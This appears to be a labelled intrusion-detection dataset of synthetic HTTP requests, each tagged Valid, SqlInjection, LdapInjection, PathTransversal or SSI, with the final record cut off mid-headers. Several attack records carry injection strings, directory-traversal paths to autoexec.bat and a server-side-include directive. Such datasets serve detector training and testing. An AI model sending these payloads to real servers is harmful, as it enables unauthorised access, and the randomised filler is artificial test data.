GET /WyTvAF4iCgf7_%ua/iqao2edtn.php3?Io7sI1=aMyq-G01q&y2v3nhNoaluz=ee&RyMxorFRwhere=it1jCOq94&mqrIm3=80204975&awaeo5=566209&effci=idhJE91pbGKQ&onenbs=2%5D%2Ff+ei%7Ene+foas&nCinCEt=727463&tTg=4rt%5DihwEt&DooNiLhtel=winntvbscriptehniitse+echo%28jt+n&cu=%5D&mantev=ut0p&dtFeotiaaeazcbw=T797gtioeaeft%7E HTTP/1.0
Host: 130.191.92.145:80
Connection: close
Accept-Charset: windows-1253;q=0.1, windows-1253;q=0.8, windows-874;q=0.4, macintosh
Accept-Language: r2mFHe-hmOa1tmb, 88zda88-tsterwt5;q=0.2, atciid2-sk8aZsb, aftse-t5Tloos;q=0.1
Client-ip: 118.8.27.231
Cookie: emxe=)(    |  (displayName=had*) (name  =    had* )( mail=had*   )
Date: Tue, 08 Dec 09 19:27:20 CET
If-Unmodified-Since: Thu, 25 Jan 07 20:30:38 UTC
If-Range: "-cV_L5FR3hE2uJzS."
Proxy-Authorization: tastT te7gttj=ethsB
Referer: /6nwlSti/Atoz/kymmo/worbn.pdf
TE: gzip;q=0.5,gzip
User-Agent: ewfl4dite4/8.6.1
Via: 4.7 41.28.58.168
Transfer-Encoding: identity

null

End - Id: 37492
Start - Id: 39091
class: LdapInjection
POST /teairDueseHeds/pgc/m-1a0uo1_SmBc1hq1fPA/l2/amrre01aw/8cq/cMOvNDLBl/h--x1HkeyxkkAfkKs/ER.fsystem.Fdu/n2.q/XNnc2@copyPkufromOmyZ/aR8fBx.mdb? HTTP/1.1
Content-Length: 198
Content-Language: WgSlnrtD,wg7
Content-Encoding: gzip
Content-Location: http://etiwfhi.de/da4d/Gdtj/HreVea/rWxa.php
Content-MD5: ZW9lSW94T29scm5vc25lQg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 28 Jun 09 17:50:52 UTC
Last-Modified: Wed, 18 Jan 06 05:49:45 GMT
Host: 253.212.36.218
Connection: zehis
Accept: audio/*
Accept-Charset: windows-1257;q=0.0, x-mac-chinesesimp, euc-tw, windows-1253, euc-cn
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 62.174.103.47
Cookie: Zo7SQZR86fYt=565)(&(objectClass=oeNa)(|(sn  =  nyo)(cn=o     J*));AIXm.bf=5395
Cookie2: $Version="8"
Date: Tue, 18 Oct 05 12:27:50 CET
ETag: "0RwvOU5Tp@gLFWTdH"
Expect: 100-continue
From: sqarh@agbp.net
If-Modified-Since: Thu, 09 Apr 09 13:36:56 UTC
If-Unmodified-Since: Mon, 30 Jun 08 07:00:55 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 64
MIME-Version: 8.7
Pragma: a=esa3e2
Proxy-Authorization: NTLM ZnJlRm40cmlHbW90bGVuYXN4a01FSEFhZXJCZW5vYnFvaHI2ZWtsMHZ5
Authorization: resbs Vief9il=autmg
Range: 8423-,-27344,42365-2055
Referer: /ysog/TfDotjf.pl
TE: deflate;q=0.6
Trailer: Host
User-Agent: Mozilla/4.2 (X11; U; Unix 3.3; mn-sf; rv:3.0.1) Gecko/82242656
UA-CPU: x86
UA-Disp: 580,0173,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 935x997
Via: r7c/9.0 225.74.14.118, 9.3 www.dutdsxse.htm:0906
Transfer-Encoding: identity
Upgrade: reo7a/2.4, seeqii/1.1, eaejz/1.9, stk1e/6.4, ios/1.7
Warning: 989 235.4.246.50 "AebkkneSsd2iipjd" "Fri, 17 Feb 06 22:50:23 GMT"
X-Forwarded-For: 171.128.179.42
X-Serial-Number: 173254856208744032
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gtnyhci=:5Dku-~tvbscriptI&ercustenoetnt=1267708313&ipgrzScA8Leso=ulsapc8na|6&9eq1X5=n;wti&Tneds=tiRujNpieselect&us=aUe&AQxDES3En=eleeeo&l4rvseyw4h=hw2ejiaudaAcrahco&7t0hh=dmochaDc&n7=ki'ee

End - Id: 39091
Start - Id: 42389
class: SqlInjection
GET /tevz6peY3CtY/kusrOdf/tt.png?uG@Zt9-autoexech=%27%29+++UNION++ALL++SELECT++++%27irmtpmaetu%27%2C84%2C9177%2C%27r2eEa%27%2C3++++FROM+++++eo+WHERE++%28++++%27%27+++%3D++++%27&rattotsu3an6=ersstiatbmiaieio HTTP/1.1
Host: www.kivawtooiw.st
Connection: keep-alive
Accept: audio/*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: se5-R5Isey, eTc-es
Cache-Control: max-age=3378
Client-ip: 173.58.91.50
Cookie: kveereWb=qinrd ntoet9 ;BN3LNP=7904;Cno=E(0seianr[t-es
Cookie2: $Version="2"
Date: Thu, 02 Dec 04 03:37:44 GMT
ETag: "6aYSx7Qj5t_MiM6u6aEP"
Expect: 100-continue
From: nU8g@Ctnnlleoe.st
If-Modified-Since: Thu, 12 Nov 09 12:32:09 GMT
If-Unmodified-Since: Wed, 19 Jul 06 06:21:51 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 03 Aug 06 01:18:18 UTC
Max-Forwards: 44
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM SW5vdWN0c2hQbnJvbmFldGFwbnBhYWszdXNhdGhvZGlnY3J5
Range: -012964
Referer: /d6e7t1rs/eipa/yvsiooTo.wmn
TE: trailers,deflate
Trailer: Host
User-Agent: oxuZznk.T http://www.snEla.ch
UA-CPU: StrongARM
UA-Disp: 8289,132,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: FTP/4.9 www.ossl1ece.html, HTTP/3.1 www.erqgiryn.gif, exGen/9.5 www.lePid.htm
Transfer-Encoding: deflate
Upgrade: rse/1.1, o5mn/7.6, zlr3/8.8, or7Eaa/3.4
Warning: 999 147.111.219.75 "f2re1Ss" 
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42389
Start - Id: 8069
class: Valid
GET /bXvDewm_xlZHGInQoIgr/hg8R.rbnCo7hqgNN7@LK/l8group bydnpwBxopenzpP/hbyd1nDuBK/50yafwuixNsKol/3Jj5Q/ngWDu-2.HE-MIy0/rtdSry.php?AD8CQLSe=4a%28ke&rou6ocaaretr=zts&pmndenrel9s1=261950&phtvsh9shie=78909340&QeqXkhk=lfohdyteosSenfgem&suei8iOte=5hwe7stA HTTP/1.1
Host: www.ud2roeheE.be
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: deflate, deflate, deflate, identity;q=0.7
Accept-Language: *
Cache-Control: max-age=42449
Client-ip: 35.135.166.225
Cookie: yWWhavingS1Y1o=6093;tiigw0if=8607
Cookie2: $Version="3"
Date: Mon, 26 Jul 04 05:26:52 GMT
ETag: "i@LyVRiJBg.TKyFZ"
Expect: 100-continue
If-Modified-Since: Sat, 06 Mar 04 17:43:48 CET
If-Unmodified-Since: Thu, 02 Nov 06 21:46:07 GMT
If-Match: "_uR.94N1Cgp30.em0"
If-None-Match: *
If-Range: Wed, 05 Jan 05 21:30:47 GMT
Max-Forwards: 66
MIME-Version: 4.3
Pragma: mpeii=am
Proxy-Authorization: Digest cnonce="rhdeitne"
Authorization: Digest realm
Range: 96926-503180,-72
Referer: http://www.otaohrt.net/uoootne/ed2adP/eimlfw.tar.gz
Trailer: If-Match
User-Agent: Mozilla/5.8 (compatible; wcAlv; Win 9x; i8i6a1)
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 782x8382
Via: 8.9 63.47.215.251, 0.2 www.esu4oa.tiff, iohuh/4.7 215.63.200.59
Transfer-Encoding: compress
Upgrade: qeatH/4.1, Oryi/4.8, osp/7.5
Warning: 742 www.5eiisbn6.jpg "s7nmb8eks7phhnpbq8e" "Thu, 28 Apr 05 22:22:02 GMT"
X-Forwarded-For: 247.192.186.78
X-Serial-Number: 74656
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8069
Start - Id: 34490
class: Valid
PUT /hrFidpstlwrdLt.js? HTTP/1.1
Content-Length: 322
Content-Language: s,ynrnc,opb
Content-Encoding: deflate
Content-Location: /caj0/neintaa/diebr/Eoe5efi0/M0ui.sh
Content-MD5: TlRFdXJidHNlemFxZnJhcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Feb 06 24:19:15 UTC
Last-Modified: Sun, 03 Jan 10 23:41:24 GMT
Host: www.Kvmitpish.ch
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-5, gb2312;q=0.0, iso-8859-2, windows-1258;q=0.9, iso-8859-15;q=0.6
Accept-Encoding: identity;q=0.7, gzip, gzip
Accept-Language: eewo-dxig;q=0.1, helt-mqpus, rEqoon-eZiqnlat;q=0.3, cc-dhty4;q=0.5, lerhii-se;q=0.5
Cache-Control: min-fresh=46321
Client-ip: 96.49.197.35
Cookie: tdtoeuowNgde3=425659;teEe19tnamE=848921383;tJu4a=qekds96smeee6;eiatlsjj=fea
Cookie2: $Version="5"
Date: Thu, 15 Nov 07 08:16:35 CET
ETag: W/"fQVQq1XnS.oBY1W"
Expect: ei9Ox7pc
From: doesa@0psfre.gov
If-Modified-Since: Wed, 04 May 05 09:19:09 GMT
If-Unmodified-Since: Thu, 19 Aug 04 08:07:46 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 06 Jun 08 12:52:09 GMT
Max-Forwards: 7
MIME-Version: 1.0
Pragma: sKcoo3='oc'
Proxy-Authorization: 8bnrqi t6sehpaY=rejt
Authorization: Digest cnonce="slDrraAo"
Range: 003-49,-300,-23
Referer: /iaaet4/eAcetqJn/ertn1/cw9i.jsp
TE: trailers,gzip;q=0.8
Trailer: Upgrade
User-Agent: hyaNar5is
UA-CPU: StrongARM
UA-Disp: 3627,6324,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7528x1732
Via: e7wu7t/2.2 www.maRhaa6.tiff, FTP/0.0 www.rsyht.tiff:38609, 7.0 www.r7rrh.html:795
Transfer-Encoding: gzip
Upgrade: lnanIi/4.1, w0wfaa/7.7
Warning: 855 158.106.17.233:019 "warne" "Sun, 23 Sep 07 02:08:13 GMT"
X-Forwarded-For: 63.206.208.126
X-Serial-Number: 16107825761
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fh=SLA riEt\&Isaoi=87&wsaa9fhorHeapc=eire9&Ct0HeoKAdcio5f=obriett42&Xcew=55514&group byOsIxpCasam0d=oisg2mIiac4accept9 e)sfv&eitst=inpMzi&bin thA\]autoexecgo4oxmls&0R28fdxjsystemDH0=44641&sjdiKt7kDcA4=8&8ns=weje%s8pyaliiframehrii&pyteeeiogtoeem=opt|ttserviceson7abm eh&lsfe&pmxubThr2h9eotb=lrIhYezBnnaeqesJ

End - Id: 34490
Start - Id: 45221
class: PathTransversal
GET .////////////////////////? HTTP/1.1
Host: 116.115.52.3
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: m-ETa7or;q=0.8, dhsstld5-inrxohe;q=0.5, enta-ndudi;q=0.2, dYgse-atituia;q=0.7
Cache-Control: max-age=48295
Client-ip: 98.132.36.144
Cookie: assent=to;Gsreret=0333999;nmp=[e;wes=85335;dnn=si h;u1zry2xetn=iuofi
Cookie2: $Version="174"
Date: Sun, 20 Apr 08 11:39:59 UTC
ETag: "Fye-r9dja0fSKIbx"
Expect: 100-continue
From: f4ot3@4et0car7.be
If-Modified-Since: Fri, 14 Mar 08 23:11:35 UTC
If-Unmodified-Since: Mon, 10 Apr 06 05:19:14 CET
If-Match: "8NKHrVu-PltzuDw"
If-None-Match: "SXfrru3q8yzDd1u2"
If-Range: "sMdrYFbvp5ulpst3DN"
Max-Forwards: 26
MIME-Version: 3.6
Pragma: ife='toyeU'
Proxy-Authorization: Digest qop=evai40
Authorization: Digest opaque="7nhte"
Range: -01750,762-,10389-0
Referer: http://oewtplxn.be/ilnqnw/nheor/isseil/4diB.gif
TE: trailers,gzip
Trailer: Expect
User-Agent: Mozilla/1.3 (Machintosh; U; PPC 6.0; sh-ap; rv:5.7.2) Gecko/85846178
UA-CPU: 68000
UA-Disp: 675,5988,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 2272x045
Via: 2.3 www.e37ie6n.jpeg
Transfer-Encoding: agt2
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 50.104.249.90
X-Serial-Number: 706890452941318
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45221
Start - Id: 42703
class: SqlInjection
PUT /v0e_/i4tQxPhYK/iE.php? HTTP/1.0
Content-Length: 204
Content-Language: an9rq,ludH
Content-Encoding: deflate
Content-Location: /o1r5dute/ooewndf/Rthixs/lseuLidv/ipdo7aoy.txt
Content-MD5: Yzc1dGp0dWFvYXRsVGVlRw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 10 Feb 04 22:35:01 UTC
Last-Modified: Sun, 22 Oct 06 24:38:47 CET
Host: www.tceeT11.it
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: '    union     select     sum(runek)    from   esesnuar--
Cache-Control: max-stale=357
Client-ip: 228.125.37.130
Cookie: ethQargesecl975= 7s
Cookie2: $Version="4"
Date: Mon, 24 Apr 06 07:24:17 CET
ETag: W/"4C7tksCaaomG@_1Ns"
Expect: thse=41osoq;itilCa
From: neeio@ame9cqfri.it
If-Modified-Since: Thu, 05 Feb 04 08:10:03 UTC
If-Unmodified-Since: Mon, 27 Mar 06 04:30:01 GMT
If-Match: "c_R5aQVj-6nWxNxPV5c"
If-None-Match: *
If-Range: "3jWM@b6bqZ8asOM"
Max-Forwards: 26
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="bii1e"
Authorization: Basic b253YWFubjpjaXFoYw==
Range: -124964,11478-05
Referer: http://www.rrooRG.de/elmrei/jiqg2eeh/iaebo85e.txt
TE: deflate;q=0.2,trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.1 (Machintosh; U; PPC Mac OS X 1.4; sn-we; rv:6.3.5) Gecko/89527415
UA-Disp: 179,0813,8
UA-OS: Windows 98
UA-Color: color16
Via: HTTP/2.9 www.sncwe.tiff, HTTP/2.8 www.urfzss.gif
Transfer-Encoding: teoe; woTajuGR=risocsYn
Upgrade: stwept/3.7, 3caoys/9.9
Warning: 745 www.otrKU.jpeg "mdsiI" "Sun, 31 Jul 05 23:34:34 CET"
X-Forwarded-For: 29.202.205.12
X-Serial-Number: 0088484140288112965
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

dw=e t2weenidi&OtoKeTsoe2qee=nhl84&nhu45=rIe6yedi6enhk&FbinsertG1ftppYM=6 id%netcatre&bRunullgL.e2DMx=a&odqnarncst=e4cerrotys&thelerne=('><Tneetupdatee&hdrRhti3ottcer=4oo5w&ieiaamAaGtzttva=03297

End - Id: 42703
Start - Id: 39476
class: SSI
POST /6jy/vbscript@y/likegzSK9c1T/touniewR93q0uh/txueeu/h.Ae/45t/3or.dll? HTTP/1.1
Content-Length: 77
Content-Language: dhgh
Content-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Host: 254.107.253.51
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Language: dfvqwtse-so;q=0.4, 7b3r1irr-o, thtwn-sihEt1
Date: Sat, 04 Aug 07 20:59:03 UTC
ETag: W/"mi47NeFVhtyS4lu7m8"
Proxy-Authorization: Digest cnonce="kn6ov"
Referer: /dsia.sh
User-Agent: <!--#email fromhost="www.md8fet.com" tohost="mailbox.ltleo.com" message="iAr2 i6trta gdhqEsda otpcd" fromaddress="idmit.com" toaddress="tpuk.lcr.com" subject="t" sender="desr.com" replyto="5benepI.com" cc="ltih" inreplyto="wroh nof ed4" id="3hvmail" -->
Upgrade: em0vat/5.4, ca3N/4.6, leaXft/1.7, ihz8D/8.7
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

sock_streamlEstylek0whereGIY=2&RTntmpoA=LNl2d&ittihnotise8ea=vetS ls&renkl=sl

End - Id: 39476
Start - Id: 36138
class: PathTransversal
GET /evVJW/6izeW_D.swf?t.htpass0Ninclude=bV6&PwTy8MILdivgtZ=aritsett2pexg1ea&hg=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat HTTP/1.0
Host: www.nhry4s.be
Connection: tbh6erm
Accept: audio/*, application/postscript;q=0.8, video/quicktime
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 83.73.80.44
Cookie: e8mecpe5oqth=m;obattdtw5r=faeh;pRdlt=nat;ta3n=81175052
Cookie2: $Version="150"
Date: Mon, 21 May 07 19:04:50 UTC
ETag: W/"eFAEGFJtDEm80bv04liq"
Expect: 0haS
From: rkCarar@2euo7u.cz
If-Modified-Since: Mon, 23 May 05 01:46:36 UTC
If-Unmodified-Since: Wed, 09 May 07 13:55:30 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 08 Mar 07 14:00:48 UTC
Max-Forwards: 9867
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: NTLM aWVpbmppdWlhaWVoc3h0MmVucXlpZDlOcnI4c291YnN2dGV0bmFhZGhoZQ==
Range: 872853-
Referer: /nEfoatoa/Srasjs/epaxEbwi.jsp
TE: trailers
Trailer: Proxy-Authorization
User-Agent: eTbdugW http://www.bctetnp2.gov
UA-CPU: MIPS
UA-Disp: 4342,924,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 795x647
Via: 0.7 www.mIoyi.jpg, as8/9.5 www.rlPnca.html:17592, 8.1 www.n4st.tiff:0
Transfer-Encoding: 6ear
Upgrade: n1LC/2.0, d6dsi/4.8
Warning: 565 www.Stne8T.html "eAh6" "Thu, 04 Dec 08 18:59:50 UTC"
X-Forwarded-For: 129.108.57.155
X-Serial-Number: 6486734154619358
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36138
Start - Id: 13373
class: Valid
GET /uCep98LT6_nbNQ9C2W/XH0/bhesr/tBgCG_I/xt8eYM6GP/egtaqv7G./nsmOdpxre6/zlorblntvhtdtma/aghamc0denne/etTb65EKNr-@U6J./waxgwvthoavoextq5eoh/hGSJHkK4seSRVJhxkM.jpg?pnelsteredeOe=qZrnoy&Q@1wxEGO8U=rcp9i&Shd=80284&WtsgHode5=%7Clcs%7EeoCfvLr%3Ebmail HTTP/1.1
Host: www.lleha.biz:401
Connection: LtDo
Accept: application/zip, image/jpeg, audio/*;q=0.2
Accept-Charset: x-mac-greek, utf-8;q=0.7, cp-932;q=0.0
Accept-Encoding: gzip, deflate;q=0.9
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 88.65.120.166
Cookie: 4catBJV8A-=8589738;bun1tesDTy=nz@dP0Yit;se4o4j=cctowqwindow.openi;lo=deaigi;pes=3522
Cookie2: $Version="97"
Date: Tue, 22 Apr 08 04:30:23 GMT
ETag: W/"S7OycLOuM3B-ZwP0fm"
Expect: 100-continue
From: 4butpT@e0niqeT8.uk
If-Modified-Since: Mon, 10 Oct 05 19:16:45 CET
If-Unmodified-Since: Sat, 05 Sep 09 09:53:40 CET
If-Match: "LvCpeEjbmpunnMtF"
If-None-Match: "@QQeJv5_BQ_FMrAeDJo4"
If-Range: Thu, 24 Aug 06 03:37:43 GMT
Max-Forwards: 3576
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: aaigsv lkaeTa=nvn1feN
Authorization: Basic RmhzZWluOmVlaG1s
Range: 1644-,849-4799,90661-23978
Referer: /dOlar/tiet.pl
TE: chunked;q=0.2,trailers
Trailer: Warning
User-Agent: i.wpd81 http://www.6agemtup.it
UA-CPU: x86
UA-Disp: 6806,3540,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8753x0793
Via: 2.9 www.r7qowaql.tiff, HTTP/1.0 www.4xxcece.js, 0.4 www.kata.html
Transfer-Encoding: gzip
Upgrade: Lda5tx/2.4, e2i/2.7, aeej/6.6, ers/1.0, sPr0/5.9
Warning: 179 www.bavgex.js "ahhenfcehln" 
X-Forwarded-For: 235.128.16.55
X-Serial-Number: 24972909787990120548
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 13373
Start - Id: 45698
class: PathTransversal
GET /uH378QACjkomS/lfooBeW69ajqtnsf/sitedegerondzMarr/t4fcUK0V8CIB6G1P8D3m/6yH/rz7m.shtml?bbAjIR3GP=nNPq&9ecoebienahhc=aoegwcn%7Crei&ec2eeiefthn=h%3A%5Cautoexec.bat&7e6=7Rbr&tAToiin71ao9nr=ajM0q&mw9NtU8=f_pveahS&8n4.KN=19&Uci7sl=+6rizrihttpsaex&oEXhtpass=+tHeausp%25ymU7 HTTP/1.0
Host: 99.192.113.255:80
Connection: elszt9te
Accept: */*;q=0.7
Accept-Charset: windows-1251;q=0.0, iso-8859-9
Accept-Encoding: deflate;q=0.1, compress, gzip;q=0.9, deflate;q=0.8
Accept-Language: Bwsupep-oano;q=0.7, wEum-athe0e2g;q=0.8, 0nv-wFeet;q=0.8, ronn-m
Cache-Control: max-age=91368
Client-ip: 23.236.107.29
Cookie: esuos=1t1hen6rmd;DTvSTM-=uaws;scasen1on=7269679;d8aVaaaoz=fynxEDoDxWG;s5e2H1eehs=5 hghttp)t|h
Cookie2: $Version="305"
Date: Tue, 20 Jul 04 04:13:40 UTC
ETag: "VHa4Nom4Fc_0gLMYw6WP"
Expect: 100-continue
From: ielefwrj@3csCfee.fr
If-Modified-Since: Fri, 11 Mar 05 08:59:47 CET
If-Unmodified-Since: Mon, 21 Aug 06 24:09:44 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 21 Feb 09 10:37:03 GMT
Max-Forwards: 5317
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest username="2ihr3onS"
Range: -934,-807,-703421
Referer: http://Gotea.com/jg2h/ntee07d1/h9as8tk/psxrtsao.mp3
TE: chunked;q=0.9,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.3 (Windows; U; Windows NT 5.9; ti-u2; rv:9.9.4) Gecko/12153747
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6938x271
Via: 4.6 237.41.149.212:70355, FTP/3.7 www.idny.jpg:4
Transfer-Encoding: elaapo; yeeeRfe=ethao
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 474 www.oRarFe.gif "irxQnatwEeiNheieol" "Sat, 16 Aug 08 18:32:38 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45698
Start - Id: 7134
class: Valid
POST /n2BS/lgbM.1VpVtE2.asmx? HTTP/1.0
Content-Length: 90
Content-Language: mYein,n,sBonc
Content-Encoding: gzip
Content-Location: /aZ9ot1le/etneg/bds44das/d67Tx/7xngdg.asmx
Content-MD5: bGptYWVpbmFub2lvZXRtZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 09 Nov 04 12:26:13 CET
Last-Modified: Thu, 07 Oct 04 21:49:23 UTC
Host: 241.143.44.190
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-hebrew
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 99.246.116.112
Cookie: reaan=rr;rpaenTelstuedir=0978;7u7iYaiia=ascr;oaramaq6gas=hs1
Cookie2: $Version="019"
Date: Wed, 01 Nov 06 20:46:38 UTC
ETag: W/"Z03U5YNJnjwQXkypKw"
Expect: 100-continue
From: kntoo@5rda2fql.com
If-Modified-Since: Mon, 02 Apr 07 14:40:53 UTC
If-Unmodified-Since: Tue, 21 Nov 06 21:10:20 CET
If-Match: *
If-None-Match: "QqGdluuMrFXTL5rv"
If-Range: *
Max-Forwards: 3217
MIME-Version: 0.7
Pragma: toMiaHS='shax'
Proxy-Authorization: NTLM bmllcnU1dGhoQmx2aG5NTGVTd2VvNm1lY2txamFpb0xn
Authorization: NTLM Y3dpdGlEQ3VxNWllYUVyZVRyZWZsaXRlc2U2ZHZvdWRvZXc5Q2lsbm9zdHdz
Range: 0-4015,-922225,063-
Referer: /hCfoy/eyost0oc/shsetrv/feeujJh.jsp
TE: chunked
Trailer: Host
User-Agent: asubr5o7o/4.8.1.5.0
UA-CPU: x86
UA-Disp: 4314,0778,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8126x925
Via: HTTP/0.0 www.os8liytr.png
Transfer-Encoding: gzip
Upgrade: ansn/1.5, iaf15t/0.0, is2t/9.1, geco/7.2
Warning: 865 4.178.100.66 "vbiayechouomeerehv" 
X-Forwarded-For: 212.135.218.165
X-Serial-Number: 73109423646427331
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

TeheOrwri=xp_&Prhy=ptocui&taea5sa=ap1F28-olVc&yoamzakmi8NdU=eC85RNVKAiX&Fj5jO5dBWrmf=Gbrte

End - Id: 7134
Start - Id: 45973
class: PathTransversal
PUT /ezeswtrfpodttiasli/bgttdtEqitdeekramo7/XidfEs/sBBmDK9j/Eeapsoc/sR.08uflFLXMW/oemoefPetusS/awA@QbinputpKpH_scriptW/nRwAcAQsL/0srfudlnkta.bin? HTTP/1.1
Content-Length: 82
Content-Language: m,sdee
Content-Encoding: gzip
Content-Location: http://www.fs7sn.org/erumne/simt.mspx
Content-MD5: U29udXQ0ZXRuZTlpbmxlOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Aug 06 11:03:02 GMT
Last-Modified: Mon, 27 Apr 09 02:28:52 UTC
Host: www.R5iea6.biz
Connection: close
Accept: audio/basic;q=0.4, audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: ../../../../../../WINDOWS/autoexec.bat
Cache-Control: only-if-cached
Cookie2: $Version="661"
Date: Thu, 15 Feb 07 10:09:00 CET
ETag: W/"I6Z0ysyfi9upk5OXhCH"
Expect: to84bwb
From: ubSynrd@jJdge.it
If-Modified-Since: Sat, 16 Oct 04 10:35:27 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 08 May 06 23:51:59 CET
Max-Forwards: 8
Pragma: o=im
Proxy-Authorization: Digest qop=furtk
Authorization: Digest nonce
Referer: http://ttonlbe.com/aursote.png
TE: trailers,chunked
Trailer: Authorization
User-Agent: feBu6e5o (i7TYkoTP5V; o7TxnKuRe; nGNG13IdK4; nks7Np0Pw; 75qi1Lb.)
UA-CPU: StrongARM
UA-Color: color16
Via: 4.0 www.3deabstf.css, 6.7 238.230.211.201, 9.5 www.Gotsi.shtml
Transfer-Encoding: gzip
Upgrade: fsoe/9.8, uwtd/5.6, pcsCta/5.2
Warning: 338 134.95.42.95 "lbocbuwzwise1Nry" 
X-Forwarded-For: 87.224.179.54
X-Serial-Number: 41893725708385200236
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

HnmavsnlronN=itzi&eseOnA36fDsqsyo=kohv(2ns&vo= eaynstdinl4rcph&oidothee=rbrc9dr9

End - Id: 45973
Start - Id: 15041
class: Valid
GET /hrcye0mmshfo/eusrppjede4aori/iart0rN6sqaahsEhte/eeasr2nnvg/ce/7UVansIjEc4319IzPUd/a5B/tcUt3gC5mQC2H4D46B.mdb?eH=chui&0tSkhechoa3slr=dom&Lt1m=adminexecd&rrnl=051658&6e0k9=zSpe&Etrr7=7x5&fiqta=IrOieiV&tna9ejooo0qt=2&bHGTX=eo0atM&uhct=etrtfi&ooatfogprmf0ecs=sidocumentanaps6tmbsH%26go HTTP/1.0
Host: 85.3.228.167:80
Connection: keep-alive
Accept: video/mpeg, audio/*;q=0.3, video/*
Accept-Charset: utf-7;q=0.8, iso-8859-1
Accept-Encoding: compress;q=0.5, gzip;q=0.5, deflate;q=0.8
Accept-Language: na-hsrw, Erate2o-reatknt;q=0.6, epw-fgGan;q=0.8, a7x-rsunhvvX;q=0.5, cfiD-gipEn5;q=0.4
Cache-Control: max-stale=8367
Client-ip: 40.118.86.87
Cookie: 2ooihhu=;;porsnae3cc=428584;hmiiod3eslpa= having3tmpy
Cookie2: $Version="713"
Date: Sat, 11 Nov 06 01:29:30 CET
ETag: "nG_4Z_E@Kh3415F"
Expect: Mebaktss
From: NBko@ilcocf4eu.ch
If-Modified-Since: Wed, 12 May 04 06:11:08 GMT
If-Unmodified-Since: Sat, 13 Dec 08 16:57:32 GMT
If-Match: "QbfMrxPhO7H0Na9"
If-None-Match: *
If-Range: Wed, 09 Jun 04 06:53:08 UTC
Max-Forwards: 8041
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest username="ttnditw"
Authorization: Basic eXJvOGplOnZocnRuYWVl
Range: 4-,-3,94-
Referer: http://Zsroii.net/Ste7ha/xlos/ebAh8r/reow/rreI2em.pl
TE: chunked,trailers,chunked
Trailer: If-Range
User-Agent: Mozilla/4.3 (X11; U; Linux i386 2.4; sn-wr; rv:7.1.8) Gecko/59279573
UA-CPU: MIPS
UA-Disp: 7976,801,8
